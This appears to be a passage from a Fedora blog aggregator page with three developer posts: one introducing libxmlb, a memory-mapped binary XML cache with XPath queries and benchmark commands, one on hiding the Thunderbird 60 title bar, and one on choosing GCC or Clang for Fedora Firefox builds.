We do need to keep the source format, but that doesn’t mean we can’t create a managed cache to do some clever things. Traditionally I’ve been quite vocal against squashing structured XML data into databases like sqlite and Xapian as it’s like pushing a square peg into a round hole, and forces you to think like a database doing 10 level nested joins to query some simple thing. What we want to use is something like XPath, where you can query data using the XML structure itself.

We also want to be able to navigate the XML document as if it was a DOM, i.e. be able to jump from one node to its sibling without parsing all the great, great, great, grandchild nodes to get there. This means storing the offset to the sibling in a binary file.

If we’re creating a cache, we might as well do the string deduplication at creation time once, rather than every time we load the data. This has the added benefit in that we’re converting the string data from variable length strings that you compare using strcmp() to quarks that you can compare just by checking two integers. This is much faster, as any SAT solver will tell you. If we’re storing a string table, we can also store the NUL byte. This seems wasteful at first, but has one huge advantage – you can mmap() the string table. In fact, you can mmap the entire cache. If you order the string table in a sensible way then you store all the related data in one block (e.g. the <id> values) so that you don’t jump all over the cache invalidating almost everything just for a common query. mmap’ing the strings means you can avoid strdup()ing every string just in case; in the case of memory pressure the kernel automatically reclaims the memory, and the next time automatically loads it from disk as required. It’s almost magic.

I’ve spent the last few days prototyping a library, which is called libxmlb until someone comes up with a better name. I’ve got a test branch of fwupd that I’ve ported from libappstream-glib and I’m happy to say that RSS has reduced from 3Mb (peak 3.61Mb) to 1Mb (peak 1.07Mb) and the startup time has gone from 280ms to 250ms. Unless I’ve missed something drastic I’m going to port gnome-software too, and will expect even bigger savings as the amount of XML is two orders of magnitude larger.

So, how do I use this thing. First, lets create a baseline doing things the old way:

$ time appstream-util search gimp.desktop
real	0m0.645s
user	0m0.800s
sys	0m0.184s

To create a binary cache:

$ time xb-tool compile appstream.xmlb /usr/share/app-info/xmls/* /usr/share/appdata/* /usr/share/metainfo/*
real	0m0.497s
user	0m0.453s
sys	0m0.028s

$ time xb-tool compile appstream.xmlb /usr/share/app-info/xmls/* /usr/share/appdata/* /usr/share/metainfo/*
real	0m0.016s
user	0m0.004s
sys	0m0.006s

Notice the second time it compiled nearly instantly, as none of the filename or modification timestamps of the sources changed. This is exactly what programs would do every time they are launched.

$ du -h appstream.xmlb
4.2M	appstream.xmlb

$ time xb-tool query appstream.xmlb "components/component[@type='desktop']/id[text()='firefox.desktop']"
RESULT: <id>firefox.desktop</id>
RESULT: <id>firefox.desktop</id>
RESULT: <id>firefox.desktop</id>
real	0m0.008s
user	0m0.007s
sys	0m0.002s

8ms includes the time to load the file, search for all the components that match the query and the time to export the XML. You get three results as there’s one AppData file, one entry in the distro AppStream, and an extra one shipped by Fedora to make Firefox featured in gnome-software. You can see the whole XML component of each result by appending /.. to the query. Unlike appstream-glib, libxmlb doesn’t try to merge components – which makes it much less magic, and a whole lot simpler.

Some questions answered:

  • Why not just use a GVariant blob?: I did initially, and the cache was huge. The deeply nested structure was packed inefficiently as you have to assume everything is a hash table of a{sv}. It was also slow to load; not much faster than just parsing the XML. It also wasn’t possible to implement the zero-copy XPath queries this way.
  • Is this API and ABI stable?: Not yet, as soon as gnome-software is ported.
  • You implemented XPath in c‽: No, only a tiny subset. See the README.md

Comments welcome.

Thunderbird 60 with title bar hidden

Posted by Martin Stransky on September 18, 2018 08:58 AM

Many users like the hidden system title bar as a Firefox feature although it’s not finished yet. But we’re very close and I hope to have Firefox 64 in a shape where the title bar can be disabled by default, at least on GNOME, to match how Firefox looks on Windows and Mac.

Thunderbird 60 was finally released for Fedora and comes with a basic version of the feature as it was introduced in Firefox 60 ESR. There’s a simple checkbox on the “Customize” page in Firefox but Thunderbird is missing an easy switch.

To disable the title bar in Thunderbird 60, go to the Edit -> Preferences menu and choose the Advanced tab. Then click Config Editor in the bottom-left corner of the page, open it and look for mail.tabs.drawInTitlebar. Double click on it and your bird should be titleless 🙂

Fedora Firefox – GCC/CLANG dilemma

Posted by Martin Stransky on September 17, 2018 09:00 PM

After reading Mike’s blog post about official Mozilla Firefox switch to LLVM Clang, I was wondering if we should also use that setup for official Fedora Firefox binaries.

The numbers look strong but, as Honza Hubicka mentioned, Mozilla uses the pretty ancient GCC 6 to create binaries and it’s not very fair to compare it with an up-to-date LLVM Clang 6.

Also, if I’m reading the Mozilla bug correctly, PGO/LTO is not yet enabled for Linux and only plain optimized builds are used for now… which means the transition at Mozilla is not as far along as I expected.

I also went through some Phoronix tests which indicate there’s no black and white situation there, although Mike claimed that LLVM Clang is generally better than GCC. But it’s possible that the Firefox codebase somehow fits LLVM Clang better than GCC.

After some consideration I think we’ll stay with GCC for now and I’m going to compare Fedora GCC 8 builds with the Mozilla LLVM Clang ones when they are available. Neither build can use -march=native so it should be a fair comparison. Also, Fedora should enable the PGO+LTO GCC setup to get the best from GCC.

[Update] I was wrong and PGO+LTO should be enabled also for Linux builds now. The numbers look very good and I wonder if we can match them with GCC 8! 🙂